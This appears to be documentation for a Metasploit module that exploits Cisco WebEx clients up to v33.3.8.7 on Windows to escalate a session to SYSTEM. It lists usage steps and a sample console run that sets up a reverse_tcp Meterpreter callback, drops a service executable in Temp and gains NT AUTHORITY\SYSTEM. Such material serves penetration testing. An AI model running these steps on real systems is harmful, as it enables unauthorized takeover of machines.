adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f632cf34bfef55fc2f602f620cda2aa70fb74c8d
metasploit-gs/documentation/modules/exploit/windows/local/webexec.md
T
cgranleese-r7 adff497bd2 Updates msf5 as well
2025-07-17 11:51:29 +01:00

63 lines
2.0 KiB
Markdown
Raw Blame History

## Description
This module gets an elevated session with System privileges by exploiting a remote code execution vulnerability found
in Cisco's WebEx client software for versions below v33.6.0.655.
## Vulnerable Application
Cisco WebEx v33.3.8.7 and below
## Verification Steps
1. Install the application
2. Start msfconsole
3. Get a session
4. Do: ```use exploit/windows/local/webexec```
5. Do: ```set SESSION <session>```
6. Do: ```run```
7. You should get an elevated session.
## Scenarios
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
```
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2018-10-24 09:41:47 -0500
meterpreter > getuid
Server username: WIN-MGMN7ND70I1\a_user
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set session 1
session => 1
msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf exploit(windows/local/webexec) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\Ak4U78kG.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49162) at 2018-10-24 09:42:35 -0500
[*] Service started...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink